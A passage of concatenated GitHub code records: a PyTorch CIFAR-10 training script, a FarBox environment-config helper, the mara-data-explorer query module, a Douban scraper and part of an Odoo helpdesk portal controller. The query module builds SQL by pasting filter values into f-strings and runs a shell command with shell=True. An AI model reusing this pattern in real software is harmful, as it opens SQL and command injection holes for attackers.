** (-6), 10 ** (-1), num_iter)\n\n for lr in lrs:\n print(f\"trying learning rate {lr}\")\n model = model_fn()\n optim = SGD(model.parameters(), lr)\n \n train_loss, train_acc, val_loss, val_acc = train(\n model, optim, train_loader, val_loader, epochs\n )\n\n if min(val_loss) < best_loss:\n best_loss = min(val_loss)\n best_lr = lr\n print(f\"Min loss: {min(val_loss)}, Min loss epoch: {np.argmin(val_loss)+1}/{epochs}\")\n return best_lr\n\ndef evaluate(\n model: nn.Module, loader: DataLoader\n) -> Tuple[float, float]:\n \"\"\"Computes test loss and accuracy of model on loader.\"\"\"\n loss = nn.CrossEntropyLoss()\n model.eval()\n test_loss = 0.0\n test_acc = 0.0\n with torch.no_grad():\n for (batch, labels) in loader:\n batch, labels = batch.to(DEVICE), labels.to(DEVICE)\n y_batch_pred = model(batch)\n batch_loss = loss(y_batch_pred, labels)\n test_loss = test_loss + batch_loss.item()\n\n pred_max = torch.argmax(y_batch_pred, 1)\n batch_acc = torch.sum(pred_max == labels)\n test_acc = test_acc + batch_acc.item()\n test_loss = test_loss / len(loader)\n test_acc = test_acc / (B_SIZE * len(loader))\n return test_loss, test_acc\n\ndef eval_linear_model(best_lr: float = 0.015):\n model = linear_model()\n optimizer = SGD(model.parameters(), best_lr)\n\n train_loss, train_accuracy, val_loss, val_accuracy = train(\n model, optimizer, train_loader, val_loader, 20\n )\n\n epochs = range(1, 21)\n plt.plot(epochs, train_accuracy, label=\"Train Accuracy\")\n plt.plot(epochs, val_accuracy, label=\"Validation Accuracy\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Accuracy\")\n plt.legend()\n plt.title(\"Logistic Regression Accuracy for CIFAR-10 vs Epoch\")\n plt.show()\n\n test_loss, test_acc = evaluate(model, test_loader)\n print(f\"Test Accuracy: {test_acc}\")\n\n# assert torch.cuda.is_available(), \"GPU is not available, check the directions above (or disable this assertion to use CPU)\"\nB_SIZE = 128\nLRS = [0.001, 0.005, 0.01, 0.025, 0.05]\nEPOCHS = 20\nTRAINING_SUBSET = 0.25\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(DEVICE) # this should print out CUDA\n\ntrain_dataset = torchvision.datasets.CIFAR10(\"./data\", train=True, download=True, transform=torchvision.transforms.ToTensor())\ntest_dataset = torchvision.datasets.CIFAR10(\"./data\", train=False, download=True, transform=torchvision.transforms.ToTensor())\norig_len = (len(train_dataset))\ntrain_dataset = torch.utils.data.dataset.Subset(train_dataset, indices=range(int(TRAINING_SUBSET * len(train_dataset))))\npartial_len = (len(train_dataset))\ntrain_dataset, val_dataset = random_split(train_dataset, [int(0.9 * len(train_dataset)), int(0.1 * len(train_dataset))])\ntrain_len = (len(train_dataset))\nprint(f\"orig_len={orig_len}, partial_len={partial_len}, train_len={train_len}\")\n\n# Create separate dataloaders for the train, test, and validation set\ntrain_loader = DataLoader(train_dataset, batch_size=B_SIZE, shuffle=True)\nval_loader = DataLoader(val_dataset, batch_size=B_SIZE, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=B_SIZE, shuffle=True)\n\nimgs, labels = next(iter(train_loader))\nprint(f\"A single batch of images has shape: {imgs.size()}\")\nexample_image, example_label = imgs[0], labels[0]\nc, w, h = example_image.size()\nd = c * w * h\n\nbest_lr = 0.015\nbest_lr = parameter_search(train_loader, val_loader, linear_model, LRS, 20)\neval_linear_model(best_lr)\n\n# model = model.to(DEVICE) # Sending a model to GPU\n\n# for x, y in tqdm(data_loader):\n# x, y = x.to(DEVICE), y.to(DEVICE) # Sending data to available device","repo_name":"ejh3/LearningMachineLearning","sub_path":"[5]cifar_classifiers/linear_nn.py","file_name":"linear_nn.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"69793828561","text":"#coding: utf8\nfrom __future__ import absolute_import\nimport os\nimport json\nfrom farbox_bucket.utils.path import read_file, make_sure_path, write_file\n\n\ndef _get_env(key):\n lower_key = key.lower()\n upper_key = key.upper()\n v = os.environ.get(key) or os.environ.get(lower_key) or os.environ.get(upper_key)\n if v:\n return v\n filenames = [key, '%s.json'%key, '%s.txt'%key]\n if lower_key not in filenames:\n filenames += [lower_key, '%s.txt'%lower_key]\n for filename in filenames:\n filepath1 = os.path.join('/tmp/env', filename)\n filepath2 = os.path.join('/env', filename)\n filepath3 = os.path.join('/mt/web/configs', filename)\n filepaths = [filepath1, filepath2, filepath3]\n path_in_env = os.environ.get(key + '_filepath')\n if path_in_env:\n filepaths.append(path_in_env)\n for filepath in filepaths:\n if os.path.isfile(filepath) and os.path.getsize(filepath) < 10*1024:\n try:\n with open(filepath, 'rb') as f:\n raw_content = f.read()\n except:\n continue\n v = raw_content.strip()\n if v:\n # cache it\n os.environ[key] = v\n return v\n\n\napp_global_envs_may_be_paths = [\"/mt/web/data/configs.json\",\n \"/mt/web/configs/configs.json\",\n \"/tmp/farbox_bucket_configs.json\"]\n\n\napp_global_config_folder = \"/mt/web/configs\"\napp_nginx_server_ssl_cert_filepath = \"/mt/web/configs/nginx/server.crt\"\napp_nginx_server_ssl_key_filepath = \"/mt/web/configs/nginx/server.key\"\n\n\n\ndef store_nginx_server_cert(ssl_key, ssl_cert):\n if not ssl_key or not ssl_cert:\n return\n old_ssl_key = read_file(app_nginx_server_ssl_key_filepath)\n old_ssl_cert = read_file(app_nginx_server_ssl_cert_filepath)\n if old_ssl_key != ssl_key or old_ssl_cert != ssl_cert:\n make_sure_path(app_nginx_server_ssl_cert_filepath, is_file=True)\n write_file(app_nginx_server_ssl_key_filepath, ssl_key)\n write_file(app_nginx_server_ssl_cert_filepath, ssl_cert)\n # reload nginx\n c_f = os.popen(\"/usr/nginx/sbin/nginx -s reload\")\n try: c_f.read()\n except: pass\n\n\n\ndef set_app_global_envs(envs_configs):\n # /mt/web/data 的优先,这样 container 的变化, /mt/web/configs 的变化也不会影响到\n if not isinstance(envs_configs, dict):\n return\n try:\n content_to_write = json.dumps(envs_configs)\n for path in app_global_envs_may_be_paths:\n try:\n with open(path, \"wb\") as f:\n f.write(content_to_write)\n # 保存主域名的 SSL 证书,主要是提供给二级域名的 wilde ssl\n store_nginx_server_cert(envs_configs.get(\"domain_ssl_key\"), envs_configs.get(\"domain_ssl_cert\"))\n return\n except:\n pass\n except:\n return\n\n\ndef load_app_global_envs():\n for path in app_global_envs_may_be_paths:\n if os.path.isfile(path):\n try:\n with open(path, \"rb\") as f:\n raw_content = f.read()\n data = json.loads(raw_content)\n if isinstance(data, dict):\n return data\n except:\n pass\n return {} # by default\n\n\nglobal_envs = None\ndef get_global_envs():\n global global_envs\n if global_envs is None:\n global_envs = load_app_global_envs()\n return global_envs\n\n\n\ndef get_env(key):\n envs = get_global_envs()\n lower_key = key.lower()\n if lower_key in envs:\n matched_value = envs.get(lower_key)\n if matched_value is not None and matched_value != \"\":\n return matched_value\n return _get_env(key)\n\n","repo_name":"hepochen/FarBox","sub_path":"farbox_bucket/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"3"}
+{"seq_id":"3951992712","text":"\"\"\"Queries on data sets\"\"\"\n\nimport datetime\nimport json\nimport re\nimport subprocess\nimport math\nimport decimal\n\nimport sqlalchemy\nfrom .data_set import find_data_set\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport mara_db.dbs\nimport mara_db.shell\nimport mara_db.postgresql\nfrom mara_page import acl\n\nBase = declarative_base()\n\n\nclass Filter():\n def __init__(self, column_name, operator, value):\n \"\"\"\n A \"where condition\" for a data set query\n Args:\n column_name: The column to filter on\n operator: The comparision operator (depends on column type\n value: The constant value to compare the column to\n \"\"\"\n self.column_name = column_name\n self.operator = operator\n self.value = value\n\n def to_dict(self):\n return {'column_name': self.column_name, 'operator': self.operator, 'value': self.value}\n\n @classmethod\n def from_dict(cls, d):\n return Filter(**d)\n\n\nclass Query(Base):\n __tablename__ = 'data_set_query'\n\n query_id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)\n data_set_id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)\n\n column_names = sqlalchemy.Column(sqlalchemy.ARRAY(sqlalchemy.TEXT))\n sort_column_name = sqlalchemy.Column(sqlalchemy.TEXT)\n sort_order = sqlalchemy.Column(sqlalchemy.TEXT)\n filters = sqlalchemy.Column(sqlalchemy.JSON)\n\n created_at = sqlalchemy.Column(sqlalchemy.TIMESTAMP(timezone=True), nullable=False)\n created_by = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)\n updated_at = sqlalchemy.Column(sqlalchemy.TIMESTAMP(timezone=True), nullable=False)\n updated_by = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)\n\n def __init__(self, data_set_id: str, query_id: str = None, column_names: [str] = None,\n sort_column_name: str = None, sort_order: str = 'ASC',\n filters: [Filter] = None,\n created_at: datetime.datetime = None, created_by: str = None,\n updated_at: datetime.datetime = None, updated_by: str = None):\n \"\"\"\n Represents a query on a data set\n\n Args:\n data_set_id: The id of the data set to query\n query_id: The id (name) of the query\n column_names: All columns that are included in the query\n sort_column_name: The column to sort on\n sort_order: How to sort, 'ASC', 'DESC' or None\n filters: Restrictions on the data set\n\n created_at: When the query was created\n created_by: Rhe user that created the query\n\n updated_at: When the query was changed the last time\n updated_by: The user that changed the query last\n \"\"\"\n self.data_set = find_data_set(data_set_id)\n\n self.data_set_id = data_set_id\n self.query_id = re.sub(r'\\W+', '-', query_id).lower() if query_id else ''\n self.column_names = [column_name for column_name in\n (self.data_set.default_column_names if column_names == None else column_names)\n if column_name in self.data_set.columns]\n self.sort_column_name = sort_column_name if sort_column_name in self.data_set.columns else None\n self.sort_order = sort_order\n self.filters = [filter for filter in filters or [] if filter.column_name in self.data_set.columns]\n self.created_at = created_at\n self.created_by = created_by\n self.updated_at = updated_at\n self.updated_by = updated_by\n\n def run(self, limit=None, offset=None, include_personal_data: bool = True):\n \"\"\"\n Runs the query and returns the result\n Args:\n limit: How many rows to return at max\n offset: Which row to start with\n include_personal_data: When True, include columns that contain personal data\n\n Returns: An array of values\n \"\"\"\n if not self.column_names: # table probably does not exists or no columns are selected\n return []\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(self.to_sql(limit=limit, offset=offset, include_personal_data=include_personal_data))\n return cursor.fetchall()\n\n def to_sql(self, limit=None, offset=None, decimal_mark: str = '.', include_personal_data: bool = True):\n if self.column_names:\n columns = []\n for column_name in self.column_names:\n if (not include_personal_data) and (column_name in self.data_set.personal_data_column_names):\n columns.append(f\"\"\"'🔒' AS \"{column_name}\" \"\"\")\n elif self.data_set.columns[column_name].type == 'number' and decimal_mark == ',':\n columns.append(f'''REPLACE(\"{column_name}\"::TEXT, '.', ',') AS \"{column_name}\"''')\n else:\n columns.append(f'\"{column_name}\"')\n\n sql = f\"\"\"\nSELECT \"\"\" + ',\\n '.join(columns) + f\"\"\"\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\n\"\"\" + self.filters_to_sql()\n if self.sort_order and self.sort_column_name:\n sql += f'\\nORDER BY \"{self.sort_column_name}\" {self.sort_order} NULLS LAST\\n';\n\n if limit is not None:\n sql += f'\\nLIMIT {int(limit)}\\n'\n if offset is not None:\n sql += f'\\nOFFSET {int(offset)}\\n'\n\n return sql\n else:\n return None\n\n def filters_to_sql(self) -> str:\n \"\"\"Renders a SQL WHERE condition for the query\"\"\"\n if self.filters:\n return 'WHERE ' + '\\n AND '.join([self.filter_to_sql(filter) for filter in self.filters]) + '\\n'\n else:\n return ''\n\n def filter_to_sql(self, filter: Filter):\n \"\"\"Renders a filter to a part of an SQL WHERE expression\"\"\"\n type = self.data_set.columns[filter.column_name].type\n if type == 'text':\n if filter.operator == '~':\n return f'\"{filter.column_name}\" ILIKE ANY(ARRAY[' \\\n + ', '.join(f\"'%{value}%'\" for value in filter.value or ['']) + ']::TEXT[])'\n else:\n return f'''\"{filter.column_name}\" {'IN' if filter.operator == '=' else 'NOT IN'} (''' \\\n + ', '.join(f\"'{value}'\" for value in filter.value or ['']) + ')'\n elif type == 'text[]':\n clause = f'''\"{filter.column_name}\" && ARRAY[''' \\\n + ', '.join(f\"'{value}'\" for value in filter.value or ['']) + ']::TEXT[]'\n if filter.operator == '!=':\n clause = ' not (' + clause + ')'\n return clause\n elif type == 'number':\n return f'''\"{filter.column_name}\" {filter.operator} {filter.value}'''\n elif type == 'date':\n return f'''\"{filter.column_name}\"::Date {filter.operator} '{filter.value}' '''\n else:\n return '1=1'\n\n def row_count(self):\n \"\"\"Compute how many rows will be returned by the current set of filters\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'SELECT count(*) FROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\" '\n + self.filters_to_sql())\n return cursor.fetchone()[0]\n\n def filter_row_count(self, filter_pos):\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(\n f'SELECT count(*) FROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\" WHERE '\n + self.filter_to_sql(self.filters[filter_pos]))\n return cursor.fetchone()[0]\n\n def as_csv(self, delimiter, decimal_mark, include_personal_data):\n query = self.to_sql(decimal_mark=decimal_mark, include_personal_data=include_personal_data).replace('\"', '\\\\\"')\n command = mara_db.shell.query_command(self.data_set.database_alias, echo_queries=False) \\\n + f''' --command=\"COPY ({query}) TO STDOUT WITH DELIMITER E'{delimiter}' CSV HEADER;\"'''\n\n return subprocess.check_output(command, shell=True)\n\n def as_rows_for_google_sheet(self, array_format, header: bool = True, limit=None,\n include_personal_data: bool = True):\n \"\"\"\n Runs the query and returns the result as Google sheet's data input (list of lists)\n Args:\n header: When True, include a header row with the column names\n limit: How many rows to return at max\n offset: Which row to start with\n include_personal_data: When True, include columns that contain personal data\n array_format: Array to string format for array types\n\n Returns: Google sheet's data input as list of lists\n \"\"\"\n if not self.column_names: # table probably does not exists or no columns are selected\n return []\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(self.to_sql(limit=limit, include_personal_data=include_personal_data))\n result = cursor.fetchall()\n if header is True:\n column_names = [desc[0] for desc in cursor.description]\n yield column_names\n for row in result:\n row_list = []\n for value in list(row):\n if isinstance(value, str):\n list_value_str = value.replace('\\t', ' - ')\n # no more than 50k characters for a single cell value (Google API limit reference)\n row_list.append((list_value_str[:48995] + ' ... ') if len(list_value_str) > 50000 else value)\n elif isinstance(value, list):\n list_value_str = str(value).replace('\\t', ' - ') if len(value) > 0 else ''\n # Adjust array format\n if array_format == 'curly':\n list_value_str = ('{' + list_value_str[1:-1] + '}').replace('{}', '')\n elif array_format == 'tuple':\n list_value_str = str(tuple(value)).replace('\\t', ' - ') if len(value) > 0 else ''\n\n row_list.append(\n (list_value_str[:48995] + ' ... ') if len(list_value_str) > 50000 else list_value_str)\n elif isinstance(value, datetime.datetime):\n row_list.append(str(value.strftime(\"%d-%m-%Y\")))\n else:\n row_list.append(value)\n yield row_list\n\n def number_distribution(self, column_name):\n \"\"\"Returns a frequency histogram for a number column\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f\"\"\"\nSELECT min(\"{column_name}\") :: NUMERIC AS min_value,\n max(\"{column_name}\") :: NUMERIC AS max_value,\n count(*) AS number_of_values\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\n\"\"\")\n (min_value, max_value, number_of_values) = cursor.fetchone()\n if min_value == None:\n return []\n\n min_buckets = 5\n\n # find the highest magnitude of 10\n exponent = math.ceil(max(abs(min_value).log10(), abs(max_value).log10()))\n\n # when there is only a single value\n if min_value == max_value:\n return ([(float(min_value), float(max_value), float(number_of_values))])\n\n while True:\n _10 = decimal.Decimal(10)\n\n # truncate to the next lower magnitude of 10\n min_ = math.floor(min_value / pow(_10, exponent))\n max_ = math.ceil(max_value / pow(_10, exponent))\n\n if (max_ - min_) > min_buckets:\n # compute buckets (tuples of min and max values)\n cursor.execute(f\"\"\"\nSELECT width_bucket(\"{column_name}\", {min_ * pow(_10, exponent)}, {max_ * pow(_10, exponent)}, {max_ - min_}) as bucket,\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP by bucket\nORDER BY bucket\n\"\"\")\n return ([(float((min_ + bucket - 1) * pow(_10, exponent)),\n float((min_ + bucket) * pow(_10, exponent)),\n n) for bucket, n in cursor.fetchall()])\n else:\n exponent += -1\n\n def date_distribution(self, column_name):\n \"\"\"Returns a frequency histogram for a date column\"\"\"\n\n import arrow\n\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f\"\"\"\nSELECT min(\"{column_name}\") :: TIMESTAMPTZ AS min_value,\n max(\"{column_name}\") :: TIMESTAMPTZ AS max_value\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\n\"\"\")\n (min_value, max_value) = cursor.fetchone()\n if min_value == None:\n return []\n\n resolutions = {'year': 'YYYY',\n 'month': 'YYYY Mon',\n 'week': 'IYYY \"-\" \"CW \"IW',\n 'day': 'Dy, Mon DD YYYY'}\n\n min_buckets = 5\n\n for resolution in resolutions.keys():\n if len(list(arrow.Arrow.range(resolution, min_value, max_value))) >= min_buckets:\n break\n\n # compute buckets (tuples of min and max values)\n cursor.execute(f\"\"\"\nSELECT date_trunc('{resolution}', \"{column_name}\") as d,\n to_char(date_trunc('{resolution}', \"{column_name}\"), '{resolutions[resolution]}'),\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP by d\nORDER BY d\n\"\"\")\n return cursor.fetchall()\n\n def text_distribution(self, column_name):\n \"\"\"Returns the most frequent values and their counts for a column\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'''\nSELECT \"{column_name}\" AS value,\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL \n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP BY value\nORDER BY n DESC\nLIMIT 10''')\n return cursor.fetchall()\n\n def text_array_distribution(self, column_name):\n \"\"\"Returns the most frequent values and their counts for a text array column\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'''\nSELECT unnest(\"{column_name}\") AS value,\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL \n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP BY value\nORDER BY n DESC\nLIMIT 10''')\n return cursor.fetchall()\n\n def save(self):\n \"\"\"Saves a query in the database\"\"\"\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nINSERT INTO data_set_query (query_id, data_set_id, column_names, sort_column_name, sort_order, filters, \n created_at, created_by, updated_at, updated_by)\nVALUES ({'%s, %s, %s, %s, %s, %s, %s, %s, %s, %s'})\nON CONFLICT (query_id, data_set_id)\nDO UPDATE SET \n column_names=EXCLUDED.column_names,\n sort_column_name=EXCLUDED.sort_column_name,\n sort_order=EXCLUDED.sort_order,\n filters=EXCLUDED.filters,\n updated_at=EXCLUDED.updated_at, \n updated_by=EXCLUDED.updated_by\n''', (self.query_id, self.data_set.id, self.column_names, self.sort_column_name, self.sort_order,\n json.dumps([filter.to_dict() for filter in self.filters]),\n datetime.datetime.now(), acl.current_user_email(),\n datetime.datetime.now(), acl.current_user_email()))\n\n @classmethod\n def load(cls, query_id, data_set_id):\n \"\"\"Loads a query from the database\"\"\"\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nSELECT data_set_id, query_id, column_names, sort_column_name, sort_order, filters, \n created_at, created_by, updated_at, updated_by \nFROM data_set_query \nWHERE data_set_id = {'%s'} AND query_id = {'%s'}''',\n (data_set_id, query_id))\n (data_set_id, query_id, column_names, sort_column_name, sort_order, filters,\n created_at, created_by, updated_at, updated_by) = cursor.fetchone()\n return Query(data_set_id, query_id, column_names, sort_column_name, sort_order,\n [Filter.from_dict(f) for f in filters],\n created_at, created_by, updated_at, updated_by)\n\n def to_dict(self):\n return {'data_set_id': self.data_set.id,\n 'query_id': self.query_id,\n 'column_names': self.column_names,\n 'sort_column_name': self.sort_column_name,\n 'sort_order': self.sort_order,\n 'filters': [filter.to_dict() for filter in self.filters],\n 'created_at': self.created_at.strftime('%Y-%m-%d') if self.created_at else None,\n 'created_by': self.created_by,\n 'updated_at': self.updated_at.strftime('%Y-%m-%d') if self.updated_at else None,\n 'updated_by': self.updated_by}\n\n @classmethod\n def from_dict(cls, d):\n d = dict(d)\n d['filters'] = [Filter.from_dict(f) for f in d['filters']]\n return Query(**d)\n\n def __repr__(self):\n return f''\n\n\ndef delete_query(data_set_id, query_id: str):\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nDELETE FROM data_set_query\nWHERE data_set_id = {'%s'} AND query_id = {'%s'}''', (data_set_id, query_id))\n\n\ndef list_queries(data_set_id: str):\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nSELECT query_id, updated_at, updated_by \nFROM data_set_query\nWHERE data_set_id = {'%s'}\nORDER BY updated_at DESC \n''', (data_set_id,))\n return cursor.fetchall()\n","repo_name":"mara/mara-data-explorer","sub_path":"mara_data_explorer/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":19286,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"20560964626","text":"import requests\nimport time\nfrom pyquery import PyQuery as pq\nimport json\n\ndef get_item(url):\n headers={\n \"User-Agent\":\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.\",\n \"Host\":\"book.douban.com\",\n \"Referer\":\"https://book.douban.com/annual/2017?source=navigation\"\n }\n response=requests.get(url=url,headers=headers)\n return response.json()\n\n\ndef parse_item(content):\n items=content.get('res').get('subjects')\n listd=[]\n if items:\n for item in items:\n\n bdict={}\n bdict['type']=content.get('res').get('payload').get('title')\n bdict['title']=item.get('title')\n bdict['rating']=item.get('rating')\n bdict['cover']=content.get('res').get('subject').get('cover')\n listd.append(bdict)\n else: return 'no books'\n return listd\n\ndef write_tofile(books):\n with open('2017书籍榜单.txt','a',encoding='utf-8') as f:\n f.write(json.dumps(books,ensure_ascii=False)+'\\n')\n\n\n\n\n\ndef main(nums):\n url='https://book.douban.com/ithil_j/activity/book_annual2017/widget/'+str(nums)\n html=get_item(url)\n books=parse_item(html)\n write_tofile(books)\n# print(books)\n\n\n\n\n\n\n \nif __name__=='__main__':\n for i in range(40):\n main(i)\n","repo_name":"jackiesune/db-annual-2017","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12914123056","text":"# -*- coding: utf-8 -*-\n\nfrom odoo.http import request\nfrom operator import itemgetter\nfrom markupsafe import Markup\nfrom odoo import fields, http, SUPERUSER_ID, _\nfrom collections import OrderedDict\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, pager as portal_pager\n# from odoo.addons.portal.controllers import portal\nfrom odoo.tools import groupby as groupbyelem\nfrom odoo.osv.expression import OR, AND\n\n\nclass CustomerPortalInheritInvoice(CustomerPortal):\n \"\"\"Inherit to overwrite the access right of sale/quotation on portal\"\"\"\n\n def _prepare_portal_layout_values(self):\n \"\"\"To enable or disable the access on portal\"\"\"\n values = super(CustomerPortalInheritInvoice, self)._prepare_portal_layout_values()\n values['ticket_enable'] = False\n user_id = request.env['res.users'].browse(request.uid)\n partner_id = request.env['res.partner'].search([('user_ids', '=', user_id.id)], limit=1)\n if partner_id and partner_id.enable_helpdesk_portal_access:\n values['ticket_enable'] = True\n\n return values\n\n def custom_helpdesk_domain(self):\n partner = request.env.user.partner_id\n domain = []\n if partner.enable_helpdesk_portal_access and not partner.access_all_helpdesk_records:\n\n domain.append(('partner_id', '=', partner.id))\n if partner.access_follower_helpdesk_records and not partner.access_all_helpdesk_records:\n domain.insert(0,'|')\n domain.append(('message_follower_ids.partner_id', '=', partner.id))\n if partner.access_all_helpdesk_records and partner.access_follower_helpdesk_records:\n\n domain.append(('message_follower_ids.partner_id', '=', partner.id))\n if partner.child_ids:\n domain.insert(0, '|')\n domain.append(('partner_id', 'in', partner.child_ids.ids))\n if partner.parent_id:\n domain.insert(0, '|')\n domain.insert(0, '|')\n domain.append(('partner_id', 'child_of', partner.parent_id.id))\n domain.append(('partner_id', '=', partner.parent_id.id))\n\n if partner.access_all_helpdesk_records and not partner.access_follower_helpdesk_records:\n\n domain.append(('partner_id', '=', partner.id))\n if partner.child_ids:\n domain.insert(0, '|')\n domain.append(('partner_id', 'in', partner.child_ids.ids))\n if partner.parent_id:\n domain.insert(0, '|')\n domain.insert(0, '|')\n domain.append(('partner_id', 'child_of', partner.parent_id.id))\n domain.append(('partner_id', '=', partner.parent_id.id))\n\n return domain\n\n def _prepare_home_portal_values(self, counters):\n values = super()._prepare_home_portal_values(counters)\n partner = request.env.user.partner_id\n if 'ticket_count' in counters:\n domain = self._prepare_helpdesk_tickets_domain()\n domain += self.custom_helpdesk_domain()\n\n values['ticket_count'] = (\n request.env['helpdesk.ticket'].sudo().search_count(domain)\n if request.env['helpdesk.ticket'].check_access_rights('read', raise_exception=False)\n else 0\n )\n return values\n\n @http.route(['/my/tickets', '/my/tickets/page/'], type='http', auth=\"user\", website=True)\n def my_helpdesk_tickets(self, page=1, date_begin=None, date_end=None, sortby=None, filterby='all', search=None,\n groupby='none', search_in='content', **kw):\n values = self._prepare_portal_layout_values()\n domain = self._prepare_helpdesk_tickets_domain()\n\n searchbar_sortings = {\n 'date': {'label': _('Newest'), 'order': 'create_date desc'},\n 'name': {'label': _('Subject'), 'order': 'name'},\n 'stage': {'label': _('Stage'), 'order': 'stage_id'},\n 'reference': {'label': _('Reference'), 'order': 'id'},\n 'update': {'label': _('Last Stage Update'), 'order': 'date_last_stage_update desc'},\n }\n searchbar_filters = {\n 'all': {'label': _('All'), 'domain': []},\n 'assigned': {'label': _('Assigned'), 'domain': [('user_id', '!=', False)]},\n 'unassigned': {'label': _('Unassigned'), 'domain': [('user_id', '=', False)]},\n 'open': {'label': _('Open'), 'domain': [('close_date', '=', False)]},\n 'closed': {'label': _('Closed'), 'domain': [('close_date', '!=', False)]},\n 'last_message_sup': {'label': _('Last message is from support')},\n 'last_message_cust': {'label': _('Last message is from customer')},\n }\n searchbar_inputs = {\n 'content': {'input': 'content', 'label': Markup(_('Search (in Content)'))},\n 'message': {'input': 'message', 'label': _('Search in Messages')},\n 'customer': {'input': 'customer', 'label': _('Search in Customer')},\n 'id': {'input': 'id', 'label': _('Search in Reference')},\n 'status': {'input': 'status', 'label': _('Search in Stage')},\n 'all': {'input': 'all', 'label': _('Search in All')},\n }\n searchbar_groupby = {\n 'none': {'input': 'none', 'label': _('None')},\n 'stage': {'input': 'stage_id', 'label': _('Stage')},\n }\n\n # default sort by value\n if not sortby:\n sortby = 'date'\n order = searchbar_sortings[sortby]['order']\n\n if filterby in ['last_message_sup', 'last_message_cust']:\n discussion_subtype_id = request.env.ref('mail.mt_comment').id\n messages = request.env['mail.message'].search_read(\n [('model', '=', 'helpdesk.ticket'), ('subtype_id', '=', discussion_subtype_id)],\n fields=['res_id', 'author_id'], order='date desc')\n last_author_dict = {}\n for message in messages:\n if message['res_id'] not in last_author_dict:\n last_author_dict[message['res_id']] = message['author_id'][0]\n\n ticket_author_list = request.env['helpdesk.ticket'].search_read(fields=['id', 'partner_id'])\n ticket_author_dict = dict(\n [(ticket_author['id'], ticket_author['partner_id'][0] if ticket_author['partner_id'] else False) for\n ticket_author in ticket_author_list])\n\n last_message_cust = []\n last_message_sup = []\n for ticket_id in last_author_dict.keys():\n if last_author_dict[ticket_id] == ticket_author_dict[ticket_id]:\n last_message_cust.append(ticket_id)\n else:\n last_message_sup.append(ticket_id)\n\n if filterby == 'last_message_cust':\n domain = AND([domain, [('id', 'in', last_message_cust)]])\n else:\n domain = AND([domain, [('id', 'in', last_message_sup)]])\n\n else:\n domain = AND([domain, searchbar_filters[filterby]['domain']])\n\n if date_begin and date_end:\n domain = AND([domain, [('create_date', '>', date_begin), ('create_date', '<=', date_end)]])\n\n # search\n if search and search_in:\n search_domain = []\n if search_in in ('id', 'all'):\n search_domain = OR([search_domain, [('id', 'ilike', search)]])\n if search_in in ('content', 'all'):\n search_domain = OR([search_domain, ['|', ('name', 'ilike', search), ('description', 'ilike', search)]])\n if search_in in ('customer', 'all'):\n search_domain = OR([search_domain, [('partner_id', 'ilike', search)]])\n if search_in in 